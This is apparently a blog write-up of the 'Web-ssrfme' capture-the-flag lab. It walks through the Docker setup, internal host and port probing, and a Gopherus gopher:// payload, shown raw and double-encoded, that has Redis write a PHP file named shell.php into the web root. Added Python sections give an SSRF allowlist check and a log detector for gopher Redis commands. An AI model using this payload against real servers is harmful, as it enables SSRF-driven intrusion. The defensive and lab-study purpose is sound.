February Open Competition: Setting up the Web-ssrfme environment with BT Panel and reproducing the vulnerability

Published: 2025-04-19 ⋅ Views: 15 ⋅ Likes: 0

1. Environment setup

1.1 Install Docker through the BT Panel

1.2 Copy the Web-ssrfme archive to Ubuntu and extract it

root@eden-virtual-machine:/# mkdir Web-ssrfme

root@eden-virtual-machine:/Web-ssrfme# ll
total 2956
drwxr-xr-x  2 root root    4096 4月  18 02:43 ./
drwxr-xr-x 24 root root    4096 4月  18 02:41 ../
-rw-r--r--  1 root root 3015411 4月  18 02:43 web-ssrfme.tar.gz

root@eden-virtual-machine:/Web-ssrfme# tar -zxvf web-ssrfme.tar.gz

root@eden-virtual-machine:/Web-ssrfme# ll
total 2960
drwxr-xr-x  3 root root    4096 4月  18 02:50 ./
drwxr-xr-x 24 root root    4096 4月  18 02:41 ../
drwxr-xr-x  4 root root    4096 2月  23  2022 web-ssrfme/
-rw-r--r--  1 root root 3015411 4月  18 02:43 web-ssrfme.tar.gz

root@eden-virtual-machine:/Web-ssrfme# cd web-ssrfme/

root@eden-virtual-machine:/Web-ssrfme/web-ssrfme# ll
total 20
drwxr-xr-x 4 root root 4096 2月  23  2022 ./
drwxr-xr-x 3 root root 4096 4月  18 02:50 ../
-rw-r--r-- 1 root root  168 2月  17  2022 docker-compose.yml
drwxr-xr-x 3 root root 4096 2月  23  2022 redis/
drwxr-xr-x 4 root root 4096 2月  17  2022 web/

root@eden-virtual-machine:/Web-ssrfme/web-ssrfme# mv docker-compose.yml redis/ web/ /Web-ssrfme/

root@eden-virtual-machine:/Web-ssrfme/web-ssrfme# cd ..

root@eden-virtual-machine:/Web-ssrfme# ll
total 2972
drwxr-xr-x  5 root root    4096 4月  18 02:58 ./
drwxr-xr-x 24 root root    4096 4月  18 02:41 ../
-rw-r--r--  1 root root     168 2月  17  2022 docker-compose.yml
drwxr-xr-x  3 root root    4096 2月  23  2022 redis/
drwxr-xr-x  4 root root    4096 2月  17  2022 web/
drwxr-xr-x  2 root root    4096 4月  18 02:58 web-ssrfme/
-rw-r--r--  1 root root 3015411 4月  18 02:43 web-ssrfme.tar.gz

root@eden-virtual-machine:/Web-ssrfme# rm -r web-ssrfme

root@eden-virtual-machine:/Web-ssrfme# rm web-ssrfme.tar.gz 

root@eden-virtual-machine:/Web-ssrfme# ll
total 20
drwxr-xr-x  4 root root 4096 4月  18 03:01 ./
drwxr-xr-x 24 root root 4096 4月  18 02:41 ../
-rw-r--r--  1 root root  168 2月  17  2022 docker-compose.yml
drwxr-xr-x  3 root root 4096 2月  23  2022 redis/
drwxr-xr-x  4 root root 4096 2月  17  2022 web/

For compatibility, the line version: "3" can be removed from docker-compose.yml.

1.3 Build the local images

root@eden-virtual-machine:/Web-ssrfme# docker-compose build
# If the build fails with the error below, fix it by changing the apt source in the Dockerfiles under web/ and redis/
# Switch the apt source to the Aliyun mirror
RUN sed -i 's|http://archive.ubuntu.com/ubuntu/|http://mirrors.aliyun.com/ubuntu/|g' /etc/apt/sources.list

=> ERROR [redis  3/13] RUN apt-get -y update     && apt-get install -y --no-install-recommends         apt-transpo  0.9s
------                                                                                                                    
 > [redis  3/13] RUN apt-get -y update     && apt-get install -y --no-install-recommends         apt-transport-https         ca-certificates         software-properties-common     && apt-get clean     && rm -rf /var/lib/apt/lists/*:            
0.715 Reading package lists...                                                                                            
0.728 E: The method driver /usr/lib/apt/methods/https could not be found.                                                 
0.728 E: The method driver /usr/lib/apt/methods/https could not be found.
0.728 E: The method driver /usr/lib/apt/methods/https could not be found.
0.728 E: The method driver /usr/lib/apt/methods/https could not be found.
------
failed to solve: process "/bin/sh -c apt-get -y update     && apt-get install -y --no-install-recommends         apt-transport-https         ca-certificates         software-properties-common     && apt-get clean     && rm -rf /var/lib/apt/lists/*" did not complete successfully: exit code: 100

After the change

root@eden-virtual-machine:/Web-ssrfme# docker-compose build
Compose can now delegate builds to bake for better performance.
 To do so, set COMPOSE_BAKE=true.
[+] Building 222.3s (33/33) FINISHED                                                                       docker:default
 => [redis internal] load build definition from Dockerfile                                                           0.0s

[+] Building 2/2
 ✔ redis  Built                                                                                                      0.0s 
 ✔ web    Built  
# build succeeded
root@eden-virtual-machine:/Web-ssrfme# docker images
REPOSITORY         TAG       IMAGE ID       CREATED              SIZE
ctf/ssrfme         latest    dba46cf12d6d   About a minute ago   392MB
web-ssrfme-redis   latest    7b3392c7a0b8   3 minutes ago        429MB
# the images have been created

1.4 Pull the images and create the containers from the BT Panel

The rest simply follows the BT Panel prompts; make sure the port is not already in use and that the firewall allows it.

1.5 Verify

If you see this code, the environment is working.

2. Finding the vulnerability

2.1 Analysing the code

Reading the code shows that a regex filters file, dict, the source address, and localhost, and that if the info parameter is present the page prints phpinfo(). The phpinfo() output may contain information useful to us.

It reveals the internal IP: 172.17.0.3:80

Now we can use Burp Suite to probe which hosts on that subnet are alive.
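Added example, not part of the original write-up and not the challenge's own PHP: a Python comparison of the blocklist style the code analysis above describes against an allowlist-based check. blocklist_check is my reconstruction of a filter that only matches file, dict and localhost; allowlist_check, is_internal, resolve_all and the port allowlist are names and choices I introduce here. The point it shows is that the blocklist still passes a gopher:// URL or a bare container address such as 172.17.0.2, while resolving the host and rejecting private, loopback and link-local addresses does not.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Schemes and ports the fetcher is allowed to use. Everything else (gopher,
# dict, file, ...) is rejected before any connection is attempted.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}


def blocklist_check(url):
    """Reconstruction (an assumption, from the write-up's description) of the
    filter style the challenge uses: reject a URL if it mentions file, dict or
    localhost. Anything else passes, including gopher:// and 172.17.0.2."""
    lowered = url.lower()
    return not any(bad in lowered for bad in ("file", "dict", "localhost"))


def is_internal(ip_text):
    """True for loopback, RFC 1918, link-local (which covers 169.254.169.254),
    unspecified, multicast and reserved addresses, IPv4 or IPv6."""
    addr = ipaddress.ip_address(ip_text)
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def resolve_all(host):
    """Return every address the host maps to; IP literals are returned as-is.
    An unresolvable name yields [] and is treated as a rejection."""
    try:
        ipaddress.ip_address(host)
        return [host]
    except ValueError:
        pass
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def allowlist_check(url):
    """Return (allowed, reason). The fetcher should then connect to one of the
    addresses this function resolved instead of resolving again, and must not
    follow redirects without re-running this check, otherwise the decision can
    be undone after it was made."""
    parsed = urlparse(url)
    if parsed.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parsed.scheme!r} not allowed"
    host = parsed.hostname
    if not host:
        return False, "missing host"
    try:
        port = parsed.port
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    addresses = resolve_all(host)
    if not addresses:
        return False, f"cannot resolve {host!r}"
    for ip_text in addresses:
        if is_internal(ip_text):
            return False, f"{host!r} resolves to internal address {ip_text}"
    return True, "ok"


if __name__ == "__main__":
    # 8.8.8.8 is a real public address, used here only to exercise the allow path.
    for candidate in ("http://172.17.0.2:6379/", "gopher://172.17.0.2:6379/_x",
                      "file:///etc/passwd", "http://8.8.8.8/"):
        print(candidate, blocklist_check(candidate), allowlist_check(candidate))
```

Both checks run without network access for IP literals; hostnames go through getaddrinfo, so the last two checks on the write-up's internal addresses would behave the same way whether the attacker supplies the address directly or through a name that resolves to it.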

2.2 Probing with Burp Suite

Probing host IPs

Capture the request, send it to the Intruder module, and scan the last octet from 1 to 255.

We can see another host at 172.17.0.2 that is also running an HTTP service, so we can try scanning that host's ports.

Probing ports

My Burp Suite is the Community edition and scanning is too slow, so here I switch on god mode and only scan 6300 to 6400.

Port 6379 returns an unmistakable Redis error, which means Redis is also running on that host, so let's try a Redis unauthorized access attack.

Next we probe which directories exist.

Probing directories

A wordlist picked at random from GitHub turned up an upload directory.

Let's go into the container to see whether this directory exists.

So the directory really exists.

3. Redis unauthorized access attack

3.1 Constructing the payload

I use the Gopherus tool to build the payload. It is open source on GitHub but a bit old and uses Python 2. If the site has not been moved it should live under /var/www/html; beyond that you can only guess. So my guess for the physical path is /var/www/html/upload.

The original payload is

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2422%0D%0A%0A%0A%3C%3Fphp%20phpinfo%28%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2420%0D%0A/var/www/html/upload%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

Be sure to change 127.0.0.1 to your target IP; here I change it to 172.17.0.2

gopher://172.17.0.2:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2422%0D%0A%0A%0A%3C%3Fphp%20phpinfo%28%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2420%0D%0A/var/www/html/upload%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

The spinner stopped after only a moment, which means the decoding went wrong: the URL is decoded once on its way through the browser, so let's URL-encode the original payload a second time and try again.

gopher://172.17.0.2:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252422%250D%250A%250A%250A%253C%253Fphp%2520phpinfo%2528%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252420%250D%250A/var/www/html/upload%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

This time the spinner hangs, which means the decoded script was written successfully.
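Added example from the defender's side, not from the write-up or from Gopherus: detection logic in Python that runs over constructed web-server access-log lines, decodes the url parameter as many times as needed, and flags gopher:// targets whose path carries RESP-encoded Redis commands such as CONFIG SET or SAVE. The log lines, the RESP sample (flushall followed by config set dir /tmp), the risk lists and the function names are all constructed for this example. It also shows what the double-encoding step above looks like from the log: the web server's query-string decode removes one layer, so a detector that decodes only once still sees %-sequences instead of commands.

```python
import re
from urllib.parse import parse_qs, quote, unquote, urlparse

# Schemes an SSRF fetcher should never reach; the challenge only blocks file
# and dict, so gopher slips through. (Constructed list for this example.)
SUSPICIOUS_SCHEMES = {"gopher", "dict", "file", "ftp", "ldap"}
# Redis commands that rewrite configuration or persist data to disk; a
# CONFIG SET dir / dbfilename followed by SAVE is the classic file-write chain.
RISKY_REDIS = {"config", "save", "bgsave", "flushall", "flushdb",
               "slaveof", "replicaof", "module", "eval", "debug"}

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def fully_decode(value, max_rounds=5):
    """Apply unquote() until the string stops changing.
    Returns (decoded, rounds); rounds > 0 means the value was still
    percent-encoded after the web server's own query-string decode."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def parse_resp(payload):
    """Parse consecutive RESP arrays of bulk strings ("*N\\r\\n$len\\r\\n<data>\\r\\n"),
    the wire form a gopher:// URL carries to Redis. Stops quietly on malformed
    input and returns whatever complete commands were found."""
    cmds, pos, n = [], 0, len(payload)
    while pos < n:
        if payload[pos] in "\r\n":          # tolerate blank lines between arrays
            pos += 1
            continue
        if payload[pos] != "*":
            break
        end = payload.find("\r\n", pos)
        if end == -1:
            break
        try:
            count = int(payload[pos + 1:end])
        except ValueError:
            break
        pos = end + 2
        args = []
        for _ in range(count):
            if pos >= n or payload[pos] != "$":
                return cmds
            end = payload.find("\r\n", pos)
            if end == -1:
                return cmds
            try:
                length = int(payload[pos + 1:end])
            except ValueError:
                return cmds
            pos = end + 2
            if pos + length + 2 > n:        # truncated bulk string
                return cmds
            args.append(payload[pos:pos + length])
            pos += length + 2               # data plus its trailing CRLF
        cmds.append(args)
    return cmds


def analyze_request_path(path):
    """Inspect the url= parameter of one request path. parse_qs reproduces the
    single decode the web server applies to the query string."""
    params = parse_qs(urlparse(path).query)
    if "url" not in params:
        return None
    target = params["url"][0]
    parsed = urlparse(target)  # CRLFs are still %0D%0A here, so urlparse is safe
    scheme = parsed.scheme.lower()
    try:
        port = parsed.port
    except ValueError:
        port = None
    inner, rounds = fully_decode(parsed.path)
    commands = []
    if scheme == "gopher" and inner.startswith("/_"):
        for cmd in parse_resp(inner[2:]):
            if cmd and cmd[0].lower() in RISKY_REDIS:
                commands.append(" ".join(cmd))
    finding = {"scheme": scheme, "host": parsed.hostname, "port": port,
               "decode_depth": 1 + rounds, "redis_commands": commands}
    finding["alert"] = scheme in SUSPICIOUS_SCHEMES or bool(commands) or rounds > 0
    return finding


def scan_log(lines):
    """Return one finding per request line that carries a url= parameter."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m:
            finding = analyze_request_path(m.group(1))
            if finding is not None:
                findings.append(finding)
    return findings


# Constructed sample traffic, not real logs. The second line is built the way
# the write-up's second attempt was: RESP bytes percent-encoded twice.
_RESP = "*1\r\n$8\r\nflushall\r\n*4\r\n$6\r\nconfig\r\n$3\r\nset\r\n$3\r\ndir\r\n$4\r\n/tmp\r\n"
_DOUBLE = quote(quote(_RESP, safe=""), safe="")
SAMPLE_LOG = [
    '172.17.0.1 - - [18/Apr/2025:03:10:01 +0000] "GET /?url=http%3A%2F%2Fexample.com%2F HTTP/1.1" 200 512',
    f'172.17.0.1 - - [18/Apr/2025:03:10:22 +0000] "GET /?url=gopher://172.17.0.2:6379/_{_DOUBLE} HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

The decoded target is deliberately not passed to urlparse a second time: once the %0D%0A sequences become real CR/LF characters, urlparse strips them and the RESP framing is lost, so the scheme and host are read from the once-decoded URL and only the path is decoded further. On the constructed lines the first request reports decode_depth 1 and no alert, the second reports gopher, decode_depth 2 and the two risky commands.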

